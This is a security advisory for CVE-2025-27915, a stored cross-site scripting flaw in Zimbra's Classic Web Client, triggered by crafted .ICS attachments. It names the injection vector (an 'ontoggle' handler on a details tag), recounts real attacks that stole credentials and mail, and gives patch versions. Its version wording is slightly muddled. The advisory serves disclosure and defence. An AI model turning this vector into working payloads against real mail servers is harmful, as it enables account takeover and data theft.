CVE-2025-27915

Name of the Vulnerable Software and Affected Versions Zimbra Collaboration Suite (ZCS) versions 9.0, 10.0, and 10.1 Zimbra Collaboration Suite versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 and earlier

Description Zimbra Collaboration Suite (ZCS) contains a stored cross-site scripting (XSS) flaw in the Classic Web Client. This issue stems from insufficient sanitization of HTML content within iCalendar (.ICS) files. An unauthenticated attacker can exploit this by sending a specially crafted email containing a malicious ICS file. When a user views the email, the embedded JavaScript code executes through an 'ontoggle' event within a

<details>

tag, enabling the attacker to run arbitrary JavaScript within the victim's session. This allows for unauthorized actions, including redirecting emails to attacker-controlled addresses and exfiltrating data. The vulnerability was actively exploited in attacks targeting the Brazilian military in January 2025, prior to the release of patches. Attackers spoofed the Libyan Navy’s Office of Protocol to deliver the malicious ICS files. The exploit involved JavaScript code designed to steal credentials, emails, contacts, and shared folders, and to add malicious email filters. The code was obfuscated using Base64 encoding and designed to remain undetected for a period of time. The estimated impact includes potential data theft and system manipulation comparable to remote code execution (RCE).

Recommendations Zimbra Collaboration Suite versions 9.0, 10.0, and 10.1: Update to version 9.0.0 Patch 44, 10.0.13, or 10.1.5 or later. Zimbra Collaboration Suite versions prior to 9.0.0 Patch 44, 10.0.13, and 10.1.5: Update to version 9.0.0 Patch 44, 10.0.13, or 10.1.5 or later.